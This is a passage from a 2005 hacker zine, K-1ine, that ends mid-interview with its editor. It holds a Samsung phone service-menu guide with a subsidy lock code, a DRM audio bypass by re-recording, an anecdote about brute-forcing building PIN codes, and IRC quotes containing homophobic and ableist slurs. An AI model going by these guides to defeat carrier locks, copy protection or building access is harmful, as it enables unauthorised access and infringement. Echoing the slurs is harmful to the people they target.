Copy Link
Add to Bookmark
Report
k-1ine_46
,.tii;i::.:::,
,ti;"' '.
.tt;' :
jt;' :;tfLGDfKLLj, t,
: .tLKWitDi;EtKEDWftGjti.
iGKG,DWDfE""' `'it.
iGK;GEGj".. .. `'f
GD;GDf' .. : .. : 'f '
L,Di' ,: G.; .. ,: E,;. f, - w : n t e r 2 o o 5 - . -
;GKf 'f
iG ijtitttjLf L; '
ii 'fKWWKD' Gj
f: .... D;
t;, ,,,,,,:::iEDjj,
jLt;;ittjfjtttiiittjfLGGGGGGGGGGGGGLfLt, ,,;i,
fLLLLLLLLLLLLLLLLGGGLLLGLGGGGGGGGGGGLiLft. ,j; jit
jjtttttttjjjjjjjjjjjjjjjtjtttjtjjjjffL;fGGj, ,i;. ;:..,i ft
fLLLLLGGGGGLfffffjjfffGGGGGGGGGGLLffjjtiLGttj, ,jjtft. ,ffi ifitt
.. 'jGDDDDDfLDDGDDjtLDDDDDGj' .:,;ijLGGGGL: ';. ,ftif' i . t :it:' L
:;ijDDDDDDDDDDffft;: :;tLjt :;Lt j .ti : ..,;:
:LDDDDDGDDDDf: `t, : : :i i ,iijt'
;DDDDD iDDDDf ii i;;;. :;tt'
:DDDDDD. fDDDDDi ij .,Df
jDDDDDD. jDDDDDD :f :L
jDDDDDi :DDDDDG :f ;f
:DDDDt jDDDDi ti. ,:jj
:DD: :DDDf L;;i, :,ij;itfj'
;i ,DD; D `:itjGEDft'
fG: ;j itfD'
i' LtiLLL'
:Kj'
jf
:E. '
Dj
ff +
tG
;E
,E .
;E :
tD
LG .
Kj .
iD;
:Ej
,iGG w
.ijfD h
,,.:;tiiiPRjtTiitt, ,it;GG o
ji;:. .:;ittttti"' `';ti.:LEj
:,;tjtjjtttttttjEKKKt" `:LKL'
,KL' `"E y
j" `tG a
:t :K
f: ,E
:D, ff g
;;;;,,,,;;itjDGGj; ,:,;,;;;;;ii;, ,K o
`'''''` iGiDfjj ,;'' 'tji. tDt n
,D GGi,j' 'fj :Gf n
Lj tGL `iDLt a
tGt D` ,;;;;;i;;iiiGLj,
t;:. .ijj E .,;;;' .;. .iLb
;D Gi .Li `;k c
tf Gj. f, tb a
:D tt :i `B l
:E L t: .. Lt l
iG j .GGfii::;;;tt;,Lj
.Ej f .iDDDGfjfLGLDGDGfT ?
LLfjtiiLj di .ifDKDDDGGDKKEKDGLP"'
,-----. ,-----;LLGKKKKKEEKKEEDGP"'
| | / / `"CYB0RG/ASM";-----.-----.----. ,----.-----------.
| | / / / | | \ | | |
| |/ / / | | \| | |
| + / ,------. '--+ | | + | +------+
| \ \ \ | | | | |
| + \ `------' | | | + | +------+
| |\ \ | | | |\ | |
| | \ \ | | | | \ | |
'-----' '-----' '-----'-----'----' '----'-----------'
````````````````` ``````````````````````````
```````````````````` `````````````````````````````
````` ``````` ```````
````` ``````` ```````
````````````````````````````` ```````` ``````` ```````````````````````
``````````````````````````````` ``````` ```````````````````````````````
```````` ```````` ```````
```````` ```````` ```````
```````` ````````````````````````````
```````` ````````````````````````
O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
| |
. randOm wOrds .
| |
. Introduction . . . . . . . . . . . . . . . . . . . . . . . The Clone .
| Contact Information . . . . . . . . . . . . . . . . . . . . The Clone |
. Link of the Quarter . . . . . . . . . . . . . . . . . . . . The Clone .
| K-1ine Mirrors . . . . . . . . . . . . . . . . . . . . . . The Clone |
. Nettwerked Donate . . . . . . . . . . . . . . . . . . . . . The Clone .
| Nettwerked Radio . . . . . . . . . . . . . . . . . . . . . The Clone |
. Voodoo Magick Boxes . . . . . . . . . . . . . . . . . . . . The Clone .
| |
. .
| dOcuments |
. .
| Guide to Programming a Samsung SPH A540 Tri-Mode PCS . . . . Kankraka |
. How To Bypass Digital Rights Management Audio Files . . . . Cygnus .
| Exclusive Interview: Crys and The Clone . . . . . . . . . . Crys |
. Contributing to the Study of Climate Change . . . . . . . . Wizbone .
| How I Pimped Impark With Simple Social Engineering . . . . . H1D30U5 |
. Free Carwashes for Fun and Profit . . . . . . . . . . . . . Anonymous .
| Back in the USSCanada . . . . . . . . . . . . . . . . . . . Aestetix |
. Obtaining IP Addresses Using MSN Messenger . . . . . . . . . H4v3n .
| A Little Insight Into the Voodoo Magick Boxes . . . . . . . Cyburnetiks|
. HID Access Control: Controlled . . . . . . . . . . . . . . . GLHeX .
| Surviving The Fall of Society . . . . . . . . . . . . . . . Doobie Ex |
. Another malware file . . . . . . . . . . . . . . . . . . . . Aftermath .
| PDF417 and your privacy . . . . . . . . . . . . . . . . . . GLHeX |
. .
| |
. .
| cOnclusiOn |
. .
| Credits . . . . . . . . . . . . . . . . . . . . . . . . . . The Clone |
. Shouts . . . . . . . . . . . . . . . . . . . . . . . . . . The Clone .
| |
O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
Introduction:
Do you believe in U.F.O.'s, astral projection, mental telepathy, ESP, clairvo-
yance, spirit photography, full-trance mediums, telekinetic movement, the Loch
Ness Monster, and the theory of Atlantis? If you do, then you have come to the
right place.
Everybody's heard ghost stories around the campfire. Heck, my grandma used to
spin yarns about a spectral locomotive that used to rocket past the farm where
she grew up. Now, as if some unseen authority had suddenly given permission,
thousands of people here are talking about encounters they claim to have had
with ghosts. The controversy builds as more sightings are reported and some
maintain that these professional paranormal eliminators on the Internet are
the cause of it all. But you know it's not true. Because I mean, if that's the
case, what do we say about UFO's and alien abductions? Stories dating back to
the ancient days of the egyptians show wall art depicting life forms from the
heavens above. Aliens, man. They are very frightening short green creatures.
And that is the whole problem with aliens. You just can't trust them. Occasion-
ally you meet a nice one... Starman, E.T. But usually they turn out to be some
kind of big lizard.
Well, that's all the time we've got this quarter on World of the Psychic. Next
quarter though... hairless pets. Weird. Until then this is The Clone saying;
when odd, unexplained stuff happens in your community... who ya gonna call?
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
Contact Information;
|*> Comments/Questions/Submissions: theclone@hackcanada.com
|*> Check out my site: (Nettwerked) http://www.nettwerked.net
|*> Check out the Web-forum: http://board.nettwerked.net/
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
Link of the Quarter:
Every quarter I post one really great "link of the quarter" on each issue
of K-1ine magazine. The link can be anything in the technology industry,
music scene, rave scene, punk scene, or even a good article you read on
a news site. I'll be taking submissions via e-mail or IRC right away; so
get your links in and maybe you'll see it in the next issue of K-1ine!
For the Winter of 2004/2005, the link of the quarter is:
http://www.protoncharging.com/ghostbusters/
Protcon Charging is a website dedicated to anything and everything
related to Ghostbusters. News, Photos, Art Work, a Message Board,
and more. It's definitely worth checking out if you're a "GB" fan!
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
K-1ine Magazine Mirrors:
WIRETAPPED
"Wiretapped.net is an archive of open source software, informational
textfiles and radio/conference broadcasts covering the areas of
network and information security, network operations, host integrity,
cryptography and privacy, among others. We believe we are now the
largest archive of this type of software and information, hosting in
excess of 20 gigabytes of information mirrored from around the world."
Now mirrored in two places, one in Belgium and another in Sydney.
http://www.mirrors.wiretapped.net/security/info/textfiles/k1ine/
HACK CANADA
"Hack Canada is the source for Canadian hacking, phreaking, freedom,
privacy, and related information."
http://www.hackcanada.com/canadian/zines/k_1ine/index.html
SECURITY-CORE
"Security-Core mirrors K-1ine.. and that's about it so far."
http://security-core.com/modules.php?op=modload&
name=Downloads&file=index&req=viewdownload&cid=5
.: (.dtors) :.
"we look good... in our new town" - Omin0us' Security website
http://dtors.ath.cx/index.php?page=k1ine
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
Nettwerked Donate:
Donate any dollar amount to Nettwerked.net and help us. To learn more on
how to donate, click here. A donation of $25.00+ will automatically put
you on a pre-order for a complimentary Nettwerked t-shirt! Read below:
Your Donation to Nettwerked.net helps us to pay for:
:. Annual domain fees associated with keeping the Nettwerked site running.
:. Bandwidth costs associated with streaming Nettwerked Radio on weekends.
:. Annual Nettwerked Meeting give-aways, and the monthly hardware give-aways.
:. Start up costs associated with development of stickers and t-shirts
Our donation to you:
We have been publishing technical articles for FREE since May 22nd, 1999.
We have contributed countless hours of our own blood (none good enough for
Canadian Blood Services), sweat and tears to help put "Nettwerked" on the
map as one of the resources of choice for the latest in Canadian H/P inf-
ormation. We have helped to create a community of friends through the
message board, monthly meetings, quarterly K-1ine releases, the mailing
list, and recently with the launch of Nettwerked Radio.
Our plans for the future:
In the future we plan on expanding Nettwerked Radio in a very large way,
and this alone will be an expensive and very time consuming task. When
we start selling official Nettwerked t-shirts later this year we will
have a large start up cost. As Nettwerked becomes more interactive and
more of a 'media' in the next couple of years, the costs of running this
site are (most) likely to increase 10-fold. Any donation amount will help
us to achieve these goals. We thank you very kindly for your contribution.
[Note: Your donation will NOT go toward contributing to our lavish and
controversial celebrity lifestyles. Your donation is not tax deductable,
it does however put you on our list of cool people to invite to our
exclusive all-female mud wrestling tournaments.]
Your donation to Nettwerked.net is not expected, but is most appreciated.
To donate please visit http://www.nettwerked.net/donate.html
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
Nettwerked Radio (Undergr0und Radio and Music every weekend!):
Tune into this critically acclaimed radio show on:
Saturday and Sunday from: 12:00am - 3:00am (MST).
To listen, please tune in to:
http://68.151.33.191:8000/listen.pls
If you're not sure whether the show is on, just visit nettwerked.net,
and look at the Radio section. If you see lime green "ONLINE", then
we are live. You can listen in using Winamp, XMMS, or anything that
will play Winamp streaming audio. We thank you for your support and
hope that you tune in, give your feedback, and make those requests!
--------------------------------------------------------
Contribute your music to Nettwerked Radio, and be heard:
--------------------------------------------------------
Do you have your own band? Are you a solo artist? Do you make your
own music on your computer, or with regular instruments? Be heard!
Nettwerked Radio, on from 12AM-3AM (MST) every Saturday and Sunday,
is now accepting submissions of YOUR original music for play. We
accept MP3 or OGG formats. If you submit your music, be sure to
include information on the band, and any information; such as
location, and history. Nettwerked Radio will play your music and
advertise your artist information! Nettwerked Radio is a great way
to be heard without having to pay out for advertising, or passing
out flyers, etc.
We respect your copyright too. We will only play your songs when
you want them played. We will not duplicate, share or otherwise
pirate your songs.
All interested artists please send your music and information to:
the.clone@gmail.com
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
Voodoo Magick Boxes:
Voodoo Liquidation! - Nettwerked.net is pleased to announce the
return of the Voodoo Magick Boxes! We are selling off the last
of these fine machines, and with a fine price tag. We're selling
for 50% less than their original cost! Buy a Voodoo Machine now:
http://www.nettwerked.net/voodoo.html
Price: $50.00 (US) + $12.00 (US) shipping.
We accept PayPal as a main form of payment, but also accept money
orders. For money orders, please make your payment in American
Funds and mail it to the following Nettwerked business address:
Nettwerked Incorporated
#195-11215 Jasper Ave
Edmonton AB T5K 0L5
Canada
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
<TwstdPair> I take it up the ass from #hackcanada and #to2600
<theclone> no shit. you're a loser. what do you expect?
<TwstdPair> leave me alone okay... my dad used to beat me
<theclone> he probably still does and you like it, fag.
<TwstdPair> :( truth hurts.
Phreaky Press Publications presents:
Kankraka's Guide to Programming a Samsung SPH A540 Tri-Mode PCS Phone!
Follow these turbo easy steps to program your Samsung A540 phone, I mean,
jebus, how hard can it be? Ahh yes, I forgot who I'm talking to, so I'll
bust a lil disclaimer action to protect my ass!
***************************************************************************
If you are incompetent, or otherwise unable to follow simple instructions,
don't start messing with your phone. I'm not gonna be held responsible
cause your dumb ass fucked up and rendered your phone useless. ALWAYS
WRITE DOWN WHAT YOU SEE BEFORE YOU CHANGE IT! That is the key to preventing
you from totally shooting yourself in the foot in this case. Trying to
"hijack" someone's phone number is both illegal, and pointless. The number
is bound to an ESN on the network, so the only way to get their number, is
to steal there phone. Which I also suggest you do not do. There, now that's
cleared up, down to business!
***************************************************************************
1. Press the PWR key to turn on the phone, yes, you WILL need the phone ON
for this *laughs.* Anyways, make sure it's fully charged, I doubt the battery
dying can do anything good when you are playing with your NAM.
2. Press MENU, 9,1,0 "Enter Lock ??????" appears on the screen
3. Enter the six-digit First Subsidy Lock Code, 858091. "Svc Menu, 1: Basic"
appears on the screen. You're now able to program your phone for a different
network.
4. Press 1 to enter Phone Number programming. "Service Mode NAM 1 CDMA" appears
5. Enter the 10-digit PCS phone number, followed by OK "NAM1 Home SID" appears.
Press OK to continue. Telus' SID is 16422, NID 65535. The phone was made for
Telus, so should automatically have that set. That information I guess is only
useful for those trying to get a different phone to work on the Telus Mobility
Network. The unit will then return to the Service menu. "Svc Menu, 1: Basic"
appears on the screen.
6. Press the END key to complete the programming. The handset will reset and
the new NAM will be in effect.
There are other options to play around with, Phone Number, General, NAM, and
A-Key. My phone lacks an A-Key, perhaps this is why my wireless web ceases to
function...
To enter Field Service, press MENU, 9, 0. Unfortunately, I don't know the lock
code for that.
Well, there ya have it, hope this becomes beneficial to someone out there,
happy "hacking!"
The above work is Copyright (c) 2004 by Phreaky Press Publications, and is
freely distributable without changes. E-mail Pheaky Press at the following:
kankraka(at)gmail(dot)com
~~SHOUTS~~
Mad shouts go out to The Clone, H1D30US, KarmaFoxx, Persephone, Tek, MsViolet,
The_p0pe, Port9, Pinguino, Mister Fitch (You know why!), MadCatX, **Kappy**,
and the rest of the Canadian scene!
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
<Kankraka> there is an imbred kid at my school
<Kankraka> he looks like a potato
<senorita> and that makes Kankraka hungry
How To Bypass Digital Rights Management Audio Files:
Digital Rights Management (which, now will just be referred to as "DRM"), is
a sneaky way for artists to protect their music.
If you download a song from a legal place - in cyberspace - such as Napster2,
you may find that these files that you download will be playable on that
computer only. They also, only - if the company has set this up - might be
playable on the companies media player (several companies have done this.)
However, there is a way to get around this.
What you'll need:
*A sound card that can record from itself (in the volume control, in the
recording section, look for 'What 'U' Hear', 'Wave Out Mix', or 'Stereo Mix'.
This is covered later.)
*A good audio editing program, meaning - if you are using Windows - NOT THE
DEFAULT RECORDER that comes with Windows! (Found in Start >> Programs >>
Accessories >> Entertainment). I recommend something powerful, yet, easy to
use, such as the free wave editor that comes with Nero Burning ROM (Nero Wave
Editor). If you are crafty enough, you'll be able to find some good programs,
that you'd usually pay for, for free.
Such good programs are:
Steinberg's "WaveLab 4"
Adobe's "Audition"
If you are using Linux, there are default recorders that will do what you're
doing, just fine.
*The player, to play your files.
*One last thing, and this is VERY IMPORTANT! You will need all of your sounds
turned off. Things that make sounds (such as msn messenger, windows', or
Linux's sounds). Turn all of those off before recording. Why? Because, you
are recording all of the sound sources that are heard from your computer.
Everything (except beeps emmited from the internal hardware speaker).
Including little msn "bloips".
PROCEDURE:
1. Open up the programs that you'll me using, these will include: Your wave
editing program. Your player. The recording volume control.
To get to this (assuming you are in Windows):
If it's there, click the speaker in the taskbar, that's in the bottom
right-hand corner, depending on your Windows version, it will either be
yellow, or grey.
If you are in Windows XP, you may need to un hide the icons in the taskbar
to get to the speaker, this is achieved by clicking the big blue, silver,
or olive green arrow by all the icons.
If it's not in the taskbar, you can also get to it by going to Start >>
Programs >> Accessories >> Entertainment >> Volume Control.
Once you are there, go to Options >> Properties >> And, in the next menu
that pops up, select recording >> Check all the boxes in the bottom menu >>
Click OK.
Look for 'What 'U' Hear', 'Wave Out Mix', or 'Stereo Mix' in the recording
control panel in your recording volumes control. Check the box that is under
that name.
Hit record on your wave editor.
Hit play on your player.
Assuming it's working, you should see the level meters bouncing up and down
with the sounds. If you are within "clipping area" or, the red area of the
meters, go to your recording control volume panel and turn the slider down,
for the one that you selected until you are in the green area in your reco-
rder.
Repeat steps 3 and 4 again.
Once it's finished - if you can, you should normalize the sound level to -
(minus) 6dB. NOT 6dB! MINUS 6dB!
Save to the WAV format if you can. This preserves full audio quality.
Do whatever you want to with your new - unprotected - file!
- Cygnus
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
Exclusive Interview: Crys and The Clone
(February 2005)
"How old were you when you got your first computer?"
The first time I got my computer. That's an excellent question. You see,
as a kid I used computers all the time in school. I first started using
the Apple IIe in grade three, and really only used that computer up until
grade 9. I guess I went to the poor inner-city schools because we were
using Apple IIe's in the 1990's! You see my mom didn't want to pitch the
funds to purchase a computer for me, so I was forced to use computers at
my sisters' house (386 SX 25, which eventually became mine), at the lib-
rary using the Edmonton Freenet, at the Edmonton Space and Science Centre
(graphical net on dual ISDN 128 lines using Netscape 2.11! Hah!). So to
answer your question; I was 15 (the year 1997) when I got my first com-
puter. Let me tell you, this computer was so old school but it worked,
and I loved it. Want to know how old it was? Think pre-386. Infact, think
pre-286! That's right, I owned a 8088. My aunt was given an old Commodore
8088 PC Clone one day from some family at her local church. Of course she
had no use for it since she already had her own computer. She knew I loved
and adored computers, so she gave it to me. This old Commodore 8088 PC
Clone run at a whopping 11Mhz, had a 40MB (Mega Byte!) hard drive, had 1MB
of ram, and for software ran DOS 5.0 with Windows 3.0. The screen was black
and white, and was really fuzzy. It was the perfect machine to play with
Basic, run old DOS Terminal Emulation programs (for Freenet and BBS' of
course), and to play my favorite game; Strip Poker. Good times were had
on it. I still wish I had that old beast. Then again, I doubt I'd have
enough room in this small apartment I'm currently in.
"How old were you when you first started using the Internet?"
I was 12 years old when I started using the Internet. I remember it clearly
because it was May of 1994 and I was ready to finish grade 8. Our class was
given the opportunity to use the ONE Macintosh computer in the entire school
with graphical Internet access... hell the only one with Internet period. I
believe the first site I visited was Sony.com because I clearly remember me
reading the "gossip" about the launch of the Playstation in Japan. My first
experience with text Internet was using a 'guest' account on the Edmonton
Freenet (now called Edmonton Community Network - which, I regret to say has
gone out of business as of this year). I had a Lynx Browser based "shell",
the 'go' to feature was disabled, and it really sucked until I paid for my
own real account which cost me a whole $15.00 a year! It was great. I got
Pine-based e-mail, the Lynx Browser (not limited), the Tin Newsreader and
the Pico Editor with a spell checker installed. It wasn't much now that I
look back at it, but it was all we had! Look at me... I'm turning into one
of those old BBS geezers reminiscing about the old days of computers. heh.
"What initially attracted you to the Internet?"
As a kid I remember reading a lot computer magazines (Mondo 2000, Wired
Magazine, 2600, Blacklisted 411) that always talked about the "Information
Superhighway", about how the Internet was the "newest greatest thing" since
sliced bread. To be honest with you, what initially attracted me to the
Internet was the hype of it all. After finally getting on the Internet, I
discovered a whole new world of like-minded individuals who shared the same
interests as me. The resources (www, search engines, news groups, ftp,
gopher, etc) that were available to me were (and still are) unbelievable.
"How did you first get interested/involved with hacking?"
Without incriminating myself too much, I would have to say what first piqued
my interest in the hacking world would be: Blacklisted 411, cDc (Cult of the
Dead Cow), 2600 Magazine, Phrack 'zine, and lastly L0pht Heavy Industries.
Before I even knew about any of these groups / magazines / 'zines, my first
real "experience" hacking was at age 11. I lived in an apartment building
that had recently implemented a building security system that required ind-
ividuals who wished access to the building to enter an extension to gain
access to the building. With a little time and energy my brother and I
determined that the building management had REALLY easy to guess pin codes
that were used on every single building across the complex. When the pin got
changed, they would set the pin code to a very easy to easy pin code, and we
would eventually (with a lot of effort, I might add) bruteforce enough pins
to finally get to the right code. It became a cat and mouse game; building
management would change a pin, we'd guess it, and then they'd change it hop-
ing we wouldn't guess it again. I wonder if they ever figured out that a 4
digit pin code can be bruteforced in less than 3 hours, typically.
"What has kept you involved with hacking/phreaking all these years? I.e.
Interest, money, chicks, the thrill, a sense of Robinhoodesque goodness,
etc."
Chicks. No really, I would say the community. The people I have had the pl-
easure of meeting over the years, including the wonderful friendship I have
created with Hack Canada and friends is what has kept me around this long.
The thrill of exploring, learning and expanding my mind has also kept me
around. Knowing that what I have contributed has changed someone's perspe-
ctive of the world in one way or another is motivating enough to keep me
kicking around.
"What is the origin of your alias, 'The Clone?'"
It all began at a little Edmonton Public Library (Woodcroft library to be
exact). At the age of 12 I had somehow come up with the alias/nickname/
handle "The Vortex", but quickly became unsatisified with that name for
reasons unknown. After reading through several books next to the Edmonton
Freenet "Dumb Terminal" (it was essentially a box with a keyboard, and a
VT100 style monitor), a science fiction book about cloning caught my eye.
It was from that point on (at age 13) that I decided "The Clone" was the
most suitable nickname for me, and it stuck. 10 years later, and look at
me; I'm still The Clone!
"Did you use other aliases previous to or after adopting 'The Clone?'"
Yes, but I'll leave it up to your imagination and "cyber-sluething" to
figure it out. Because naturally if I told you those nicknames, I would
have to kill you*. (* Not really).
"How long have you been running nettwerked.net?"
Before I go on explaining how Nettwerked started, I feel explaining what
led up to Nettwerked.net a tad more interesting. In the beginning there
was VI (Virtual Insanity). I met the leader of this hacker group (Prince
Slick) and his pal Kinslay3r on a popular Internet text-based chat server
called "Alamak Chat" (www.alamak.net) in the summer of 1997. After a two-
year stint in this organization, I moved on and started a half-serious
group (which quite frankly was more of a duo) with long-time friend
Wizbone. We called the group "Telus Watchers". Telus Watchers had its own
website on then free web-page service provider HyperMart.net. The site
contained a few of our hacker / phreaker files, and a collection of misc-
ellaneous scene-related links. Soon after Wizbone and I discovered a
homegrown site calling itself "Hack Canada" (www.hackcanada.com). You see
Wizbone actually came across this site by pure chance back in 1998 when
surfing through Wired.com (Wired News, a great techo-resource, though it's
no MONDO-2000; may it rest in peace). Wired had covered a story about how
Edmonton based Hack Canada had created a redbox program for the Palm Pilot
PDA. Intrigued by this article, Wizbone set his sights on communicating
with the group's webmaster, CYB0RG/ASM, about Telus Watchers and the scene
in general. Soon after Wizbone joined forces with Hack Canada as a core-
member, Telus Watchers disappeared soon after, and as a result I was on my
own. In May of 1999 out of pure bordem I started Nettwerked (also hosted on
HyperMart.net until 2000, when I purchased a real domain name) - a "non-
member" site dedicated to researching phone phreaking, hacking, and every-
thing else in between. Shortly after creating this site, I began publishing
my own phone phreaking related "philes" on Nettwerked, and after writing up
a few decent articles, put them into a compilation that eventually became
K-1ine Magazine; now the longest running H/P 'zine in Canada! Oh and in
case you were wondering, I *was* invited to join Hack Canada around a month
later and graciously accepted. ;)
"How does hacking differ from phreaking?"
These days hacking and phreaking really aren't that different. Phone systems
are now computer controlled at the Central Office (C.O.) of the ILEC (Incu-
mbent Local Exchange Carrier). But don't get me wrong; there definitely is
a significant difference between hacking and phreaking. With conventional
"hacking", you're typically sitting at computer screen writing code, break-
ing through the security on remote terminals, doing authorized or unauthor-
ized vulnerability assessment, reverse engineering, or just simply making
software/hardware you are working with do something it wasn't meant to do.
With phreaking, you are almost always dialing on a telephone. Phreaking is
the art of telecom exploration. Phreaking normally involves a lot of sequ-
ential and non-sequential dialing through local, long distance, or toll free
#'s for the sole purpose of discovery. "But discovery of what?" you ask.
Simple; when phreaking you're typically scanning for vulnerable PBX (Private
Branch Exchange) systems, Voice Mail, test numbers (i.e. loops, diverters,
test tones), payphones, and more. With the introduction of VoIP (Voice over
Internet Protocol), phreaking and hacking in a lot of ways have blended into
one. Now you can have corporate or residential phone service routing over the
Internet. What does this mean? It means that individuals with hacking exper-
ience can now exploit telecommunications networks from behind the keyboard
instead of with the touch of the phone pad. Phreakers who wish to stay ahead
of the game are encouraged to learn more about computer hacking in order to
make the most of VoIP (SIP and equivalent); though I figure you have at least
another 30-40 years before POTS (Plain Old Telephone Service) Copper becomes
completely obsolete. I've personally always found phreaking more interesting
than hacking as my large assortment of technical telco articles will show you.
"How would you define the terms 'Black Hat Hacker', 'White Hat Hacker', and
'Gray Hat Hacker?'"
I would define it this way; An Easy Way For The Media To Categorize A Complex
And Uncategorizable Scene. There is no black or white. There is a gray area...
like everything in life, naturally. People are never 100% bad or 100% good.
You have your "script kiddies" (morons who do DDoS'ing, and deface webpages
for no political or "hacktivism" reason) and then you have everyone else. I
really hate labelling.
"What do you feel motivates most hacking? Ie. Greed, curiosity, boredom,
wanting to help (companys security, an individual, humanity in general?"
Despite what Mass Media wants to have you believe; hacking is still mostly
motivated by curiosity and the desire to challenge ones self. There are
always individuals who are in "it" for greed and for destructive purposes,
but we all know those people aren't even hackers in the truest sense of
the word.
"What do you wish would motivate hacking, in a perfect world?"
Curiosity and a desire to challenge ones self. I wish more hacking was done
for political reasons, and done to help change the world in a positive way
(i.e. by preserving privacy, helping the Internet run more efficiently
through creative programming). Hackers that define hacking done the right
way; Hack Canada (www.hackcanada.com) does it right. Read up on our fight
against BarLink, read about our research into telecommunications security,
PDA security, and wetware hacking. Oxblood Ruffin from Cult of the Dead Cow
(www.cultdeadcow.com) did it right when he coined "hacktivism". According to
TheHacktivist.com "Hacktivism is the fusion of hacking and activism; politics
and technology. More specifically, hacktivism is described as hacking for a
political cause. In this context, the term hacker is used in reference to its
original meaning. As defined in the New Hacker's Dictionary, a hacker is "a
person who enjoys exploring the details of programmable systems and how to
stretch their capabilities" and one who is capable of "creatively overcoming
or circumventing limitations". Activism is defined as "a policy of taking
direct and militant action to achieve a political or social goal". Therefore,
a clinical definition of hacktivism is: Hacktivism: a policy of hacking,
phreaking or creating technology to achieve a political or social goal".
"What motivates your hacking?"
The three c's: Curiosity, Control, and Caffeine!
"What purpose does a hackers alias serve?"
A hackers alias serves many purposes. The ability to stay anonymous, the
ability to have another online identity without having to worry about being
identified in person; and thus judged as something. A hackers alias usually
says something about their personality in one way or another. You see with
MY alias it's obvious I'm an anti-birth activist who is all for the cloning
of children for reproduction rather than having to make a woman suffer thr-
ough 9 months of hell.
"What are your feelings regarding the hacker stereotype perpetuated by movies
like 'Hackers' and newspapers reporting on major viruses/worms?"
It used to bother me. But as years went by, I simply gave up trying to conv-
ince the world what "hackers" are and what "criminals" are. If the media is
too stupid to know the difference, and the people swallowing it up are too
stupid to figure out the difference then I see no use in trying to waste my
time explaining it to them. I prefer to focus my energy on useful things.
"Do you feel you behave differently in online situations than in real life?"
To be honest with you; not at all. There are a LOT of people I know online
that act completely different in person than they do online, but I believe
its not on purpose. Then again, I've had the unfortunate opportunity to talk
to a few kids who act like they are the roughest thing to come out of maximum
security prison when online, and when I do eventually meet them in person th-
ese rough kids turn out to be prepubescent little twerps. I like to call this
"small mans syndrome".
"How important was/is your reputation in the hacking community?"
When I first got involved in the hacking community my reputation mattered a
lot because in a small way I was trying to build a positive reputation. By
now I imagine I've gathered somewhat of a positive reputation (with the
exception to a few morons online who I won't name) in the hacking community.
Through the 150+ H/P article contributions, the K-1ine 'zine contribution,
the Nettwerked Radio Show, Def Con conference appearances, and the monthly
Nettwerked Meetings I've made a LOT of friends and thus built a reputation.
So how important is it now? VERY important. Reputation is everything. Show
me one person that doesn't care about his or her reputation. You simply
cannot find anyone who doesn't care - unless they're mentally retarded.
"Do you feel most people (hackers or civilians) create online personas as
well as their pseudonyms?"
Of course. For some being online is an escape from the realities of "real
life".
"What are some pseudonyms you found particularly memorable? I.e. Wizbone,
DaGrl4U, etc."
From the Freenet.net newsgroup days I would have to say; Crys, Bronaugh,
Dagrl4u, N_Space, Sven, and wizbone. I miss those days... back when I
could be a total idiot and usually get away with it. God, Wizbone and I
caused so much shit for the Freenet staff... I'm surprised they didn't
just come down to our homes and beat us to death with cat-5 cables. I
know I would if I had to deal with kids that were as crazy as us. haha.
"Would you say you have trouble dealing with people face to face?"
No. Ask anyone I know, I'm probably one of the more social people out
there. I love meeting people, hanging out with old friends, and having
a great time. If you're looking to categorize an entire culture, or look
to stereotype a hacker, you're talking to the wrong guy. I'm probably
the furthest from your text book example of an "anti-social geek" that
you'll ever find (i.e. I get laid, I have lots of friends, and I'm
extremely social).
"Do you find it at all odd to call people by their aliases rather than
their given names?"
Not at all. When online, at the Nettwerked Meetings, or when I'm conso-
rting with a group of my "hacker friends", using each others aliases
instead of our real names is second nature. We don't even think about
how "odd" it is to use each others aliases as opposed to real names.
The only exception where I might find it odd to call someone by their
alias is if we're in a group where a large number of friends know a
particular person by their real name, and a small number do not. If
someone makes the mistake of calling me "The Clone" around friends
that only know me by my real name, jokes will ensue.
"Does your answer above change with the development of a real life
relationship?"
No, not at all.
"Do you feel things like sexism, racism, and bigotry can/do exist in
'online communities', and within interactions such as chatrooms and
online dating?"
Yes. You can change the communications protocol, but you can't change
people. People are always sexist, racist, and down right disgusting.
You get them in "real life" and you get them online. From my personal
experience, I have found that people are bigger racists, sexists,
assholes online than in person; because they feel they're anonymous
and therefore unaccountable for their behaviors. In a lot of cases,
they are not accountable. On the Nettwerked Discussion Board and on
IRC, we occassionally get people who behave in an inappropriate way.
We make sure to promptly warn them that their behavior will not be
tolerated, and any further unappropriate behavior will result in
their removal. The problems we have are very minimal though. Most
people in our community are great.
"How has (the physical act of) hacking changed since you began?"
If by the "physical act of hacking" you mean dumpster diving, modi-
fying payphones for the purpose of free calls and/or phreaking,
then I would have to say it hasn't changed much. Except now we have
people who call themselves "Urban Explorers". I have nothing against
Urban Exploration, because it's exciting to go somewhere you're not
supposed to go, and finding places less travelled. The only problem
is; I don't see how "Urban Exploration" is anything new. People have
been exploring abandoned buildings, tunnels, sewers for years without
the trendy label of urban explorer. Same shit, different name.
"Has the hacking scene changed at all? I.e. Attracting more/less
